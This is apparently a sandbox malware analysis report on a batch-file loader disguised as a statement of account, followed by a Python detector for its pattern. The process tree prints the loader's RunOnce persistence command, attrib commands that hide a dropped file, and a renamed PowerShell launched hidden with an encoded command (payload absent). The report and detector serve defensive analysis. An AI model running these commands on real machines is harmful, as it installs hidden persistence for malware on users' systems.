Analysis
max time kernel: 29s
max time network: 32s
platform: windows7_x64
resource: win7-20230220-en
resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
submitted: 31-03-2023 07:23
Static task: static1
Behavioral task: behavioral1
Sample: SOA Feb-March 2023.bat
Resource: win7-20230220-en
General
Target: SOA Feb-March 2023.bat
Size: 1.3MB
MD5: 9f8f23997c4e07be88d8dbe835c8b6ed
SHA1: 9f40b97b7e1605b05174a6547b9ff470511d5a1f
SHA256: a354101aa8c8db6f2b337ebc68571edd296d374ad8a99f79fd62d2c07321993e
SHA512: 5c0660381331a47163f7cd4e1e87c156966dd8c068d852073429523d29e92c934f3de381a7bd8e6cf1efaf94b21864c91c620b850e93c2399ccef476d8228586
SSDEEP: 24576:VXdQ7L0Et7plPQaneOkwJzHqOoLokXb184bQM9w5WpFapcq+14kEKaQ8wV9GtnR:KznmW1VH9w2S4QPGr
Malware Config
Signatures
- Sets file to hidden (1 TTP, 1 IoC)
  Modifies file attributes to stop it showing in Explorer etc.
- Executes dropped EXE (1 IoC)
  Processes: PID 1920 SOA Feb-March 2023.bat.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour. (This is the sandbox's generic description for the signature; nothing else captured in this run shows file encryption, so treat it as a weak indicator on its own.)
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes: PID 1920 SOA Feb-March 2023.bat.exe
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes: PID 1920 SOA Feb-March 2023.bat.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: PID 1920 SOA Feb-March 2023.bat.exe, Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (13 IoCs)
  Processes:
    PID 1984 cmd.exe wrote to memory of PID 1748 reg.exe (3 times)
    PID 1984 cmd.exe wrote to memory of PID 1712 attrib.exe (3 times)
    PID 1984 cmd.exe wrote to memory of PID 1920 SOA Feb-March 2023.bat.exe (4 times)
    PID 1984 cmd.exe wrote to memory of PID 1880 attrib.exe (3 times)
  (A parent writing into a child it has just created is normal CreateProcess behaviour, not injection; the useful signal here is the set of children cmd.exe spawned, not the API call itself.)
- Views/modifies file attributes (1 TTP, 2 IoCs)
  Processes: PID 1712 attrib.exe, PID 1880 attrib.exe
Processes
C:\Windows\system32\cmd.exe (PID 1984)
  cmd /c "C:\Users\Admin\AppData\Local\Temp\SOA Feb-March 2023.bat"
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\reg.exe (PID 1748)
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v SOA Feb-March 2023 /d "C:\Users\Admin\AppData\Roaming\SOA Feb-March 2023.bat"
  C:\Windows\system32\attrib.exe (PID 1712)
    attrib +s +h "C:\Users\Admin\AppData\Local\Temp\SOA Feb-March 2023.bat".exe
    - Sets file to hidden
    - Views/modifies file attributes
  C:\Users\Admin\AppData\Local\Temp\SOA Feb-March 2023.bat.exe (PID 1920)
    "C:\Users\Admin\AppData\Local\Temp\SOA Feb-March 2023.bat".exe -wIn 1 -enC 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
    - Executes dropped EXE
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\attrib.exe (PID 1880)
    attrib -s -h "C:\Users\Admin\AppData\Local\Temp\SOA Feb-March 2023.bat".exe
    - Views/modifies file attributes

Reading the tree: the batch file first registers a RunOnce value under HKCU pointing at a copy of itself in AppData\Roaming; no process event shows that copy being written, which is expected if the batch uses cmd.exe's built-in copy command (no child process). It then drops a 442KB executable beside itself named "SOA Feb-March 2023.bat.exe", marks it system+hidden with attrib, runs it, and clears the attributes afterwards. The launch arguments -wIn 1 -enC are abbreviated PowerShell parameters (-WindowStyle 1, i.e. Hidden, and -EncodedCommand; PowerShell accepts any unambiguous prefix of a parameter name), which is consistent with the common batch-loader trick of copying powershell.exe under the script's own name with .exe appended. The encoded command is not reproduced in this report and is where the actual payload lives. To confirm, compare the dropped file (MD5 92f44e405db16ac55d97e3bfe3b132fa) against powershell.exe on the win7-20230220-en image, and decode the -enC argument from the full command line (base64 of UTF-16LE text).
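As an added example (not part of the sandbox report), the following detector runs over constructed process-creation records modelled on the tree above and flags the loader pattern: a cmd.exe parent whose children write a Run/RunOnce value, hide a file with attrib, launch a double-extension "<script>.exe" image with an abbreviated -EncodedCommand, and unhide it again. It generalizes slightly beyond the sample by accepting any prefix of the PowerShell parameter names and any script extension before .exe. The record layout, function names, the PIDs' parent (1000) and the encoded payload are assumptions; the sample's real encoded command is not on this page.

```python
import base64
import binascii
import re
from collections import defaultdict

# Constructed process-creation records modelled on the tree above
# (Sysmon Event ID 1 style fields). The -enC payload is a constructed
# stand-in: the sample's real encoded command is not reproduced on this page.
STANDIN_SCRIPT = "Write-Host 'constructed stand-in payload'"
ENCODED = base64.b64encode(STANDIN_SCRIPT.encode("utf-16-le")).decode()
TMP = r"C:\Users\Admin\AppData\Local\Temp"
EVENTS = [
    {"pid": 1984, "ppid": 1000, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": f'cmd /c "{TMP}\\SOA Feb-March 2023.bat"'},
    {"pid": 1748, "ppid": 1984, "image": r"C:\Windows\system32\reg.exe",
     "cmdline": r"reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce"
                r' /f /v SOA Feb-March 2023 /d "C:\Users\Admin\AppData\Roaming\SOA Feb-March 2023.bat"'},
    {"pid": 1712, "ppid": 1984, "image": r"C:\Windows\system32\attrib.exe",
     "cmdline": f'attrib +s +h "{TMP}\\SOA Feb-March 2023.bat".exe'},
    {"pid": 1920, "ppid": 1984, "image": f"{TMP}\\SOA Feb-March 2023.bat.exe",
     "cmdline": f'"{TMP}\\SOA Feb-March 2023.bat".exe -wIn 1 -enC {ENCODED}'},
    {"pid": 1880, "ppid": 1984, "image": r"C:\Windows\system32\attrib.exe",
     "cmdline": f'attrib -s -h "{TMP}\\SOA Feb-March 2023.bat".exe'},
    {"pid": 2000, "ppid": 1000, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": "cmd /c dir"},  # benign noise that must not match
]

RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(?:Once)?\b", re.IGNORECASE)
# Image basename ending in <script extension>.exe, e.g. "invoice.bat.exe".
DOUBLE_EXT_RE = re.compile(r"\.(?:bat|cmd|ps1|vbs|js)\.exe$", re.IGNORECASE)


def _is_param(token, full_name):
    """PowerShell accepts any unambiguous prefix of a parameter name, so
    '-enC' is -EncodedCommand and '-wIn' is -WindowStyle."""
    body = token[1:].lower()
    return token.startswith("-") and len(body) >= 1 and full_name.startswith(body)


def _param_value(cmdline, full_name):
    tokens = cmdline.split()
    for tok, nxt in zip(tokens, tokens[1:]):
        if _is_param(tok, full_name):
            return nxt
    return None


def decode_encoded_command(cmdline):
    """Decode -EncodedCommand (base64 of UTF-16LE text); None if absent/invalid."""
    blob = _param_value(cmdline, "encodedcommand")
    if blob is None:
        return None
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def hidden_window(cmdline):
    """True when -WindowStyle is Hidden, given by name or by its enum value 1."""
    val = _param_value(cmdline, "windowstyle")
    return val is not None and val.lower() in ("1", "hidden")


def analyse_chain(events):
    """Flag cmd.exe parents whose children form the loader pattern:
    Run/RunOnce write, attrib +h, launch of a *.<script>.exe with an
    encoded command, attrib -h. Returns {parent_pid: findings}."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)

    results = {}
    for ppid, kids in children.items():
        parent = by_pid.get(ppid)
        if parent is None or not parent["image"].lower().endswith("\\cmd.exe"):
            continue
        f = {"runonce_target": None, "hidden": [], "unhidden": [], "dropped": []}
        for c in kids:
            img, cl = c["image"].lower(), c["cmdline"]
            toks = cl.lower().split()
            if img.endswith("\\reg.exe") and "add" in toks and RUN_KEY_RE.search(cl):
                m = re.search(r'/d\s+"?([^"]+)"?', cl)
                f["runonce_target"] = m.group(1).strip() if m else cl
            elif img.endswith("\\attrib.exe"):
                if "+h" in toks:
                    f["hidden"].append(c["pid"])
                if "-h" in toks:
                    f["unhidden"].append(c["pid"])
            elif DOUBLE_EXT_RE.search(img):
                f["dropped"].append({
                    "pid": c["pid"], "image": c["image"],
                    "hidden_window": hidden_window(cl),
                    "decoded_script": decode_encoded_command(cl)})
        # Require the dropped-exe launch plus at least two supporting steps.
        if f["dropped"] and sum(bool(v) for v in f.values()) >= 3:
            results[ppid] = f
    return results


if __name__ == "__main__":
    for ppid, f in analyse_chain(EVENTS).items():
        print(f"cmd.exe PID {ppid}: RunOnce -> {f['runonce_target']}")
        for d in f["dropped"]:
            print(f"  dropped {d['image']} (PID {d['pid']}), hidden window={d['hidden_window']}")
            print(f"  decoded: {d['decoded_script']!r}")
```

The prefix handling is the point: a rule that looks for the literal string -EncodedCommand misses this sample's -enC, so match on parameter prefixes (or on the decoded content) and on the parent/child shape rather than on one exact token.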
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\SOA Feb-March 2023.bat.exe
  Filesize: 442KB
  MD5: 92f44e405db16ac55d97e3bfe3b132fa
  SHA1: 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
  SHA256: 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
  SHA512: f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f
- memory/1920-60-0x0000000001E80000-0x0000000001EC0000-memory.dmp
  Filesize: 256KB